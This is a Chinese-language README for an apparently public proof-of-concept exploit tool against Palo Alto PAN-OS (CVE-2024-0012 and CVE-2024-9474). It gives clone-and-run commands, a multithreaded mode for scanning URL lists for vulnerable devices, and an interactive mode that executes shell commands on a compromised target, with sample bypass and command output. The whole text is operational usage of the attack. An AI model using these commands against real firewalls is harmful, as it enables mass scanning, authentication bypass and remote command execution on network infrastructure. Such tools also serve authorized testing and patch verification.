此脚本是 Palo Alto PAN-OS 漏洞(CVE-2024-0012 与 CVE-2024-9474)的概念验证(PoC)利用程序。该脚本可用于扫描 URL 列表以检测漏洞,或以交互方式利用单个易受攻击的 URL。
git clone https://github.com/aratane/CVE-2024-9474
cd CVE-2024-9474
go mod tidy
github.com/cheggaaa/pb/v3:显示扫描状态的进度条。 github.com/gookit/color:控制台输出的增强颜色支持。 github.com/manifoldco/promptui:交互式命令行提示。 github.com/p0dalirius/goopts/parser:命令行参数解析。
扫描模式用于检查多个 URL 是否存在漏洞。您需要提供一个包含 URL 列表的文件。
go run main.go --file urls.txt --output results.txt --threads 100
--file:包含待扫描 URL 列表的文件路径。 --output:保存扫描结果的路径(默认:output.txt)。 --threads:用于扫描的并发线程数(默认:200)。
http://example1.com
http://example2.com
利用模式允许您以交互方式利用易受攻击的 URL。
go run main.go --url http://target.com --output results.txt
--url:要利用的目标 URL。 --output:保存利用结果的路径。 一旦进入利用模式,您可以输入要在目标系统上执行的命令。输入 exit 退出交互式 shell。
要显示帮助信息:
go run main.go --help
扫描完成后,结果将保存到指定的输出文件(例如 results.txt):
[+] http://example1.com - 身份验证绕过成功
[+] http://example2.com - 身份验证绕过成功
在以交互方式利用 URL 时,命令输出会在目标上执行命令后显示:
# ls /var
bin app lib tmp
# exit
[+] 正在退出交互式 shell。
命令行参数
本项目采用 MIT 许可证 - 详见 LICENSE 文件。
| 标志 | 描述 | 默认值 |
|---|
| --url | 在利用模式下要利用的 URL | |
| --file | 包含待扫描 URL 的文件(扫描模式使用) | |
| --output | 保存结果的输出文件 | output.txt |
| --threads | 扫描模式的并发线程数 | 200 |
| --help | 显示帮助信息 |